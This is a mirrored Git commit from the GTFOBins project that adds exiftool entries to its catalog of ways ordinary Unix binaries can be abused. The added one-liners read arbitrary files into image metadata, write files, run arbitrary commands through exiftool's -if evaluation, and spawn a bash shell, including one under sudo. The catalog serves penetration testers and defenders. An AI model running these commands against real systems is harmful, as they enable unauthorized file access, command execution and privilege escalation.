mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-08 16:31:34 +01:00
Code Issues

Merge dd497c2190b18b7296d6e9cf2ad9bded0fbe4564 into b29f2cfde1c72e4ea5191e49604e923bbda98461

Browse Source
This commit is contained in:
Alexey Zhuchkov 2025-10-20 16:57:45 +09:00 committed by GitHub
commit de953c725e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 24 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
_gtfobins/exiftool.md
View File

@ -8,14 +8,38 @@ functions:
OUTPUT=output_file
exiftool -filename=$OUTPUT $LFILE
cat $OUTPUT
- description: Exfiltrate file data via metadata tags
code: |
LFILE=file_read
INPUT=input_file
exiftool "-description<=$LFILE" --filename $INPUT
file-write:
- code: |
LFILE=file_to_write
INPUT=input_file
exiftool -filename=$LFILE $INPUT
- description: Write file from metadata tag's content
code: |
LFILE=file_to_write
INPUT=input_file
exiftool -description -W $LFILE --filename $INPUT
sudo:
- code: |
LFILE=file_to_write
INPUT=input_file
sudo exiftool -filename=$LFILE $INPUT
command:
- code: |
COMMAND=command_to_execute
INPUT=input_file
exiftool -if "system('$COMMAND');1" --filename $INPUT
- description: Run system command and exfiltrate result via metadata tags
code: |
COMMAND=command_to_execute
INPUT=input_file
exiftool -userparam "inj=Test" -if "\$\$self{OPTIONS}{UserParam}{inj}=\`$COMMAND\`;1" '-description<$inj' --filename $INPUT
shell:
- code: |
INPUT=input_file
exiftool -if "system('bash')" $INPUT
---